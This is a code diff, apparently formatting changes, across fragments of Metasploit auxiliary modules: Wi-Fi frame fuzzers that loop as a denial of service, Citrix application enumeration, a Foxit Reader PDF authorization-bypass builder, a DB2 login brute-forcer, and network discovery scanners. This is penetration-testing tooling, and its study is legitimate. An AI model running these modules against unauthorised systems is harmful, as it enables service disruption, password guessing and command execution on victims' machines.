0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Beacon Frame Fuzzer',
'Description' => %q{
This module sends out corrupted beacon frames.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
], self.class)
end
def ping_check
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
end
return false
end
def run
srand(0)
@@uni = 0
frames = []
open_wifi
print_status("Sending corrupt frames...")
while (true)
frame = create_frame()
if (datastore['PING_HOST'])
if (frames.length >= 5)
frames.shift
frames.push(frame)
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
frames.push(frame)
end
1.upto(3) do
1.upto(3) do
wifi.write(frame)
if (not ping_check())
frames.each do |f|
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
print_status f.inspect
end
return
end
end
end
else
else
wifi.write(frame)
end
end
@ -95,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
#"\x00\x05" + # capability flags
Rex::Text.rand_text(2) +
Rex::Text.rand_text(2) +
# ssid tag
"\x00" + ssid.length.chr + ssid +
@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary
d = Rex::Text.rand_text(l)
frame += t.chr + l.chr + d
end
return frame
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Probe Response Frame Fuzzer',
'Description' => %q{
This module sends out corrupted probe response frames.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -32,8 +32,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
end
def ping_check
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
end
return false
end
def run
srand(0)
@@uni = 0
frames = []
open_wifi
print_status("Sending corrupt frames...")
while (true)
frame = create_frame()
if (datastore['PING_HOST'])
if (frames.length >= 5)
frames.shift
frames.push(frame)
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
frames.push(frame)
end
1.upto(10) do
1.upto(10) do
wifi.write(frame)
if (not ping_check())
frames.each do |f|
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
print_status f.inspect
end
return
end
end
end
else
else
wifi.write(frame)
end
end
@ -93,30 +93,30 @@ class Metasploit3 < Msf::Auxiliary
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) # capability flags
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
# ssid tag
frame << "\x00" + ssid.length.chr + ssid
# supported rates
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
# current channel
frame << "\x03" + "\x01" + channel.chr
1.upto(ies) do |i|
max = mtu - frame.length
break if max < 2
@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
d = Rex::Text.rand_text(l)
frame += t.chr + l.chr + d
end
return frame
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'Version' => '$Revision$',
'References' =>
[
'References' =>
[
[ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
]
))
@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
def run
connect_udp
print_status("Attempting to contact Citrix ICA service...")
client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'Version' => '$Revision$',
'References' =>
[
'References' =>
[
[ 'OSVDB', '50617' ],
[ 'BID', '5817' ],
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
def run
connect_udp
print_status("Attempting to contact Citrix ICA service...")
client = Rex::Text.rand_text_alphanumeric(8) # Client NetBIOS hostname. This works fine >:)
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Auxiliary
application_valid = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Citrix is publishing this application
application_invalid = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Application not found / published
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
@ -153,19 +153,19 @@ class Metasploit3 < Msf::Auxiliary
packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00"
packet << "#{(39 + application.length).chr}\x00\x00\x00\x00\x00" + application + "\x00\x01\x00\x04\x00"
packet << client + "\x00"
udp_sock.put(packet)
res = udp_sock.get(3)
if (res[0,application_valid.length] == application_valid)
print_status("Found: #{application}")
end
if (res[0,application_invalid.length] == application_invalid)
print_error("NOT Found: #{application}")
end
end
else
print_error("Server did not respond.")
end

View File

@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@ -17,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Foxit Reader Authorization Bypass',
'Description' => %q{
This module exploits a authorization bypass vulnerability in Foxit Reader
build 1120. When a attacker creates a specially crafted pdf file containing
a Open/Execute action, arbitrary commands can be executed without confirmation
from the victim.
build 1120. When a attacker creates a specially crafted pdf file containing
a Open/Execute action, arbitrary commands can be executed without confirmation
from the victim.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-0836' ],
[ 'BID', '34035' ],
@ -32,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
'DisclosureDate' => 'Mar 9 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
register_options(
[
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
end
@ -47,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
# Create the pdf
pdf = make_pdf(exec)
print_status("Creating '#{datastore['FILENAME']}' file...")
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
end
result
end
def ioDef(id)
"%d 0 obj" % id
end
@ -80,13 +84,13 @@ class Metasploit3 < Msf::Auxiliary
def ioRef(id)
"%d 0 R" % id
end
def make_pdf(exec)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
# Randomize PDF version?
pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
pdf << "%" << RandomNonASCIIString(4) << eol

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,12 +14,12 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DB2
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DB2 Authentication Brute Force Utility',
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => ['todb'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]),
], self.class)
end
def run_host(ip)
@ -58,10 +58,10 @@ class Metasploit3 < Msf::Auxiliary
begin
info = db2_check_login
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
return :abort
rescue ::Rex::Proto::DRDA::RespError => e
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
return :abort
end
disconnect

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DB2
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DB2 Probe Utility',
@ -39,26 +39,26 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
verbose = datastore['VERBOSE']
begin
info = db2_probe(2)
if info[:excsatrd]
inst,plat,ver,pta = info[:instance_name],info[:platform],info[:version],info[:plaintext_auth]
report_info = "Platform: #{plat}, Version: #{ver}, Instance: #{inst}, Plain-Authentication: #{pta ? "OK" : "NO"}"
print_status("#{ip}:#{rport} DB2 - #{report_info}")
report_service(
:host => rhost,
:host => rhost,
:port => rport,
:name => "db2",
:info => report_info
)
end
disconnect
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
return :done
rescue ::Rex::Proto::DRDA::RespError => e
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
return :error
end
end

View File

@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
@ -8,11 +12,11 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Udp
def initialize
super(
'Name' => 'DB2 Discovery Service Detection.',
@ -21,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'MC' ],
'License' => MSF_LICENSE
)
register_options([Opt::RPORT(523),], self.class)
deregister_options('RHOST')
end
def run_host(ip)
pkt = "DB2GETADDR" + "\x00" + "SQL05000" + "\x00"
begin
@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
connect_udp
udp_sock.put(pkt)
res = udp_sock.read(1024).split(/\x00/)
if (res)
report_note(
:host => ip,
@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect_udp
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
rescue ::Errno::EPIPE
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::DCERPC
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Hidden DCERPC Service Discovery',
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
This module will query the endpoint mapper and make a list
of all ncacn_tcp RPC services. It will then connect to each of
these services and use the management API to list all other
these services and use the management API to list all other
RPC services accessible on this port. Any RPC service found attached
to a TCP port, but not listed in the endpoint mapper, will be displayed
and analyzed to see whether anonymous access is permitted.
@ -36,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'hdm',
'License' => MSF_LICENSE
)
deregister_options('RHOST', 'RPORT')
end
# Obtain information about a single host
def run_host(ip)
def run_host(ip)
begin
epm = dcerpc_endpoint_list()
@ -49,27 +49,27 @@ class Metasploit3 < Msf::Auxiliary
print_status("Could not contact the endpoint mapper on #{ip}")
return
end
eports = {}
epm.each do |ep|
next if !(ep[:port] and ep[:prot] and ep[:prot] == "tcp")
eports[ep[:port]] ||= {}
eports[ep[:port]][ep[:uuid]+'_'+ep[:vers]] = true
end
eports.each_pair do |eport, servs|
rport = eport
print_status("Looking for services on #{ip}:#{rport}...")
ids = dcerpc_mgmt_inq_if_ids(rport)
return if not ids
ids.each do |id|
if (not servs.has_key?(id[0]+'_'+id[1]))
print_status("\tHIDDEN: UUID #{id[0]} v#{id[1]}")
conn = nil
bind = nil
call = nil
@ -85,41 +85,41 @@ class Metasploit3 < Msf::Auxiliary
res = dcerpc.call(0, NDR.long(0) * 128)
call = true
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
data = dcerpc.last_response.stub_data
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
error = e.to_s
end
if (error and error =~ /DCERPC FAULT/ and error !~ /nca_s_fault_access_denied/)
call = true
end
status = "\t\t"
status << "CONN " if conn
status << "BIND " if bind
status << "CALL " if call
status << "DATA=#{data.unpack("H*")[0]} " if data
status << "ERROR=#{error} " if error
print_status(status)
print_status("")
end
end
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error: #{e}")
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,42 +17,42 @@ class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::DCERPC
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Remote Management Interface Discovery',
'Version' => '$Revision$',
'Description' => %q{
This module can be used to obtain information from the Remote
This module can be used to obtain information from the Remote
Management Interface DCERPC service.
},
'Author' => 'hdm',
'License' => MSF_LICENSE
)
deregister_options('RHOST')
register_options(
[
Opt::RPORT(135)
], self.class)
], self.class)
end
# Obtain information about a single host
def run_host(ip)
def run_host(ip)
begin
ids = dcerpc_mgmt_inq_if_ids(rport)
return if not ids
ids.each do |id|
print_status("UUID #{id[0]} v#{id[1]}")
stats = dcerpc_mgmt_inq_if_stats(rport)
print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", ")) if stats
live = dcerpc_mgmt_is_server_listening(rport)
print_status("\t listening: %.8x" % live) if live
@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary
princ = dcerpc_mgmt_inq_princ_name(rport)
print_status("\t name: #{princ.unpack("H*")[0]}") if princ
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error: #{e}")
end
end
end

View File

@ -1,5 +1,15 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@ -7,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'ARP Sweep Local Network Discovery',
@ -18,12 +28,12 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'belch',
'License' => MSF_LICENSE
)
register_options([
OptString.new('SHOST', [true, "Source IP Address"]),
OptString.new('SMAC', [true, "Source MAC Address"]),
], self.class)
deregister_options('SNAPLEN', 'FILTER')
end
@ -32,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary
end
def run_batch(hosts)
shost = datastore['SHOST']
shost = datastore['SHOST']
smac = datastore['SMAC']
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
begin
hosts.each do |dhost|
probe = buildprobe(datastore['SHOST'], datastore['SMAC'], dhost)
capture.inject(probe)
@ -47,34 +57,34 @@ class Metasploit3 < Msf::Auxiliary
while(reply = getreply())
next if not reply[:arp]
print_status("#{reply[:arp].spa} appears to be up.")
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
end
end
etime = Time.now.to_f + (hosts.length * 0.05)
while (Time.now.to_f < etime)
while(reply = getreply())
next if not reply[:arp]
print_status("#{reply[:arp].spa} appears to be up.")
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
end
Kernel.select(nil, nil, nil, 0.50)
end
ensure
close_pcap()
end
end
def buildprobe(shost, smac, dhost)
